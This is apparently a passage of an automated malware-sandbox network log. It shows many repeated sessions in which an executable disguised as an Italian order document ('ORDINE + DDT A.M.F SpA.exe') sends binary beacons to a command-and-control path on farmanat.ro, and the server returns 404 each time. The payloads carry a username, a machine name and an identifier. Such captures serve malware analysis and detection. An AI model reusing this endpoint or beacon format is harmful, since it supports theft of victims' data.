Nov 25, 2021 10:50:05.692300081 CET	6634	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:05.725790977 CET	6635	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:05.779927969 CET	6635	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
227	192.168.11.20	50069	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:06.194184065 CET	6636	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:06.227742910 CET	6636	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:06.284095049 CET	6636	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
228	192.168.11.20	50070	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:06.671276093 CET	6637	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:06.705171108 CET	6637	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:06.754846096 CET	6638	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
229	192.168.11.20	50071	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:07.189424038 CET	6638	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:07.222987890 CET	6639	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:07.292504072 CET	6639	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.11.20	49858	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:16.437510014 CET	6337	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:16.471724033 CET	6337	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:16.523509979 CET	6337	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
230	192.168.11.20	50072	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:07.699299097 CET	6640	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:07.733006954 CET	6640	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:07.791333914 CET	6640	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
231	192.168.11.20	50073	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:08.201999903 CET	6641	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:08.236202002 CET	6641	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:08.296416998 CET	6642	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
232	192.168.11.20	50074	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:08.706878901 CET	6642	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:08.741132021 CET	6643	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:08.799254894 CET	6643	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
233	192.168.11.20	50075	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:09.222779989 CET	6644	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:09.256258965 CET	6644	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:09.311629057 CET	6644	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
234	192.168.11.20	50076	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:09.674115896 CET	6645	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:09.708259106 CET	6645	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:09.757879019 CET	6646	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
235	192.168.11.20	50077	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:10.188350916 CET	6646	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:10.221869946 CET	6647	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:10.274288893 CET	6647	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
236	192.168.11.20	50078	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:10.703556061 CET	6648	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:10.737229109 CET	6648	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:10.788405895 CET	6648	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
237	192.168.11.20	50079	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:11.205022097 CET	6649	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:11.239279032 CET	6649	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:11.291445017 CET	6650	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
238	192.168.11.20	50080	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:11.714368105 CET	6650	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:11.748078108 CET	6651	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:11.797611952 CET	6651	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
239	192.168.11.20	50081	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:12.226092100 CET	6652	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:12.260006905 CET	6652	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:12.310113907 CET	6652	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.11.20	49859	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:17.100651979 CET	6338	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:17.135035992 CET	6338	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:17.190354109 CET	6339	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
240	192.168.11.20	50082	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:12.706710100 CET	6653	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:12.740931034 CET	6653	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:12.797348022 CET	6654	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
241	192.168.11.20	50083	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:13.215744972 CET	6654	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:13.250005007 CET	6655	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:13.300825119 CET	6655	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
242	192.168.11.20	50084	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:13.714873075 CET	6656	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:13.749361038 CET	6656	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:13.806813955 CET	6656	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
243	192.168.11.20	50085	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:14.199511051 CET	6657	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:14.233372927 CET	6657	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:14.290170908 CET	6658	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
244	192.168.11.20	50086	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:14.643841982 CET	6658	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:14.678226948 CET	6659	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
